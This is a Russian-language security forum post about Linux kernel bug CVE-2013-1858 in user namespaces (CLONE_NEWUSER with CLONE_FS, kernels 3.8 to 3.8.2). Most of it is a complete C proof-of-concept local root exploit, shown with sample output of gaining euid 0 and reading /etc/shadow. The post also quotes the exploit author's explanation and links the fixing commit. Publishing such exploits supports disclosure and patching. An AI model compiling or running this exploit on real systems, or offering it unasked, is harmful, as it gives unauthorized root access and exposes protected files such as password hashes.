Prev Предыдущее сообщение   Следующее сообщение Next
Старый 14.03.2013, 12:51   #1
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию CVE-2013-1858 Linux kernel CLONE_NEWUSER|CLONE_FS root exploit 3.8 — 3.8.2

Цитата:
The trick is to setup a chroot in your CLONE_NEWUSER,
but also affecting the parent, which is running
in the init_user_ns, but with the chroot shared.
Then its trivial to get a rootshell from that.

Tested on a openSUSE12.1 with a custom build 3.8.2 (x86_64).
Очередной малозначительный баг, связан с появившимися в 3.8 user_namespaces (похоже в них еще много багов найдут).

Автор - Sebastian Krahmer (@steaIth).

Цитата:
@grsecurity: Clone with one thread in a user ns, the other staying in init ns, both sharing task->fs (includes fs root)...
@grsecurity: Chroot inside user ns then affects thread outside user ns, with chroot set up with hardlinked su binary and exploit bin inside
@grsecurity: Exploit bin gets loaded with real suid root privilege, makes itself suid root for nice real root shell
Исправляющий коммит: https://git.kernel.org/cgit/linux/ke...20d1f2ca332c71


Код:
/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
 *
 * Dedicated to: Locke Locke Locke Locke Locke Locke Locke!
 *
 * This exploit was made on the 13.3.13.
 *
 * (C) 2013 Sebastian Krahmer
 *
 * We are so 90's, but we do 2013 xSports.
 *
 * Must be compiled static:
 *
 * stealth@linux-czfh:~> cc -Wall clown-newuser.c -static
 * stealth@linux-czfh:~> ./a.out
 * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
 *
 * [+] Found myself: '/home/stealth/a.out'
 *[*] Parent waiting for boomsh to appear ...
 *[*] Setting up chroot ...
 * [+] Done.
 *[*] Cloning evil child ...
 * [+] Done.
 *[*] Creating UID mapping ...
 * [+] Done.
 * [+] Yay! euid=0 uid=1000
 * linux-czfh:/home/stealth # grep bin /etc/shadow
 * bin:*:15288::::::
 * linux-czfh:/home/stealth #
 *
 */
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>


int go[2];
char child_stack[1<<20];
extern char **environ;


void die(const char *msg)
{
	perror(msg);
	exit(errno);
}


int child(void *arg)
{
	char c;

	close(go[1]);
	read(go[0], &c, 1);

	setuid(0);

	/* this will also affect the parent, but the parent
	 * has the init_user_ns, so it will start suid with real uid 0.
	 */
	if (chdir("chroot") < 0)
		die("[-] chdir");
	if (chroot(".") < 0)
		die("[-] chroot");

	return 0;
}



int setup_chroot(const char *me)
{
	mkdir("chroot", 0755);
	mkdir("chroot/lib64", 0755);
	mkdir("chroot/bin", 0755);

	if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
		die("[-] link");
	if (link("/bin/su", "chroot/bin/su") < 0)
		die("[-] link");
	return 0;
}


int main(int argc, char *argv[])
{
	char *su[] = {"/bin/su", NULL};
	char *sh[] = {"/bin/bash", NULL};
	char me[256], *mee[] = {me, "1", NULL};
	char uidmap[128], map_file[128];
	pid_t pid;
	struct stat st;
	int fd;


	if (geteuid() == 0 && argc == 1) {
		/* this will run inside chroot, started as the ld.so from
		 * su process
		 */
		printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
		chown("lib64/ld-linux-x86-64.so.2", 0, 0);
		chmod("lib64/ld-linux-x86-64.so.2", 04755);
		exit(0);
	} else if (geteuid() == 0) {
		/* this will run outside */
		setuid(0);
		execve(*sh, sh, environ);
		die("[-] execve");
	}

	printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");

	memset(me, 0, sizeof(me));
	readlink("/proc/self/exe", me, sizeof(me) - 1);
	printf("[+] Found myself: '%s'\n", me);

	if (fork() > 0) {
		printf("[*] Parent waiting for boomsh to appear ...\n");
		for (;;) {
			stat(me, &st);
			if (st.st_uid == 0)
				break;
			usleep(1000);
		}
		execve(me, mee, environ);
		die("[-] execve");
	}

	printf("[*] Setting up chroot ...\n");
	setup_chroot(me);
	printf("[+] Done.\n[*] Cloning evil child ...\n");

	if (pipe(go) < 0)
		die("[-] pipe");

	pid = clone(child, child_stack + sizeof(child_stack),
	            CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
	if (pid == -1)
		die("[-] clone");

	printf("[+] Done.\n[*] Creating UID mapping ...\n");

	snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
	if ((fd = open(map_file, O_RDWR)) < 0)
		die("[-] open");
	snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
	if (write(fd, uidmap, strlen(uidmap)) < 0)
		die("[-] write");
	close(fd);
	printf("[+] Done.\n");

	close(go[0]);
	write(go[1], "X", 1);

	waitpid(pid, NULL, 0);
	execve(*su, su, NULL);
	die("[-] execve");
	return -1;
}
SynQ вне форума   Ответить с цитированием
 

Метки
exploit, kernel, linux

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot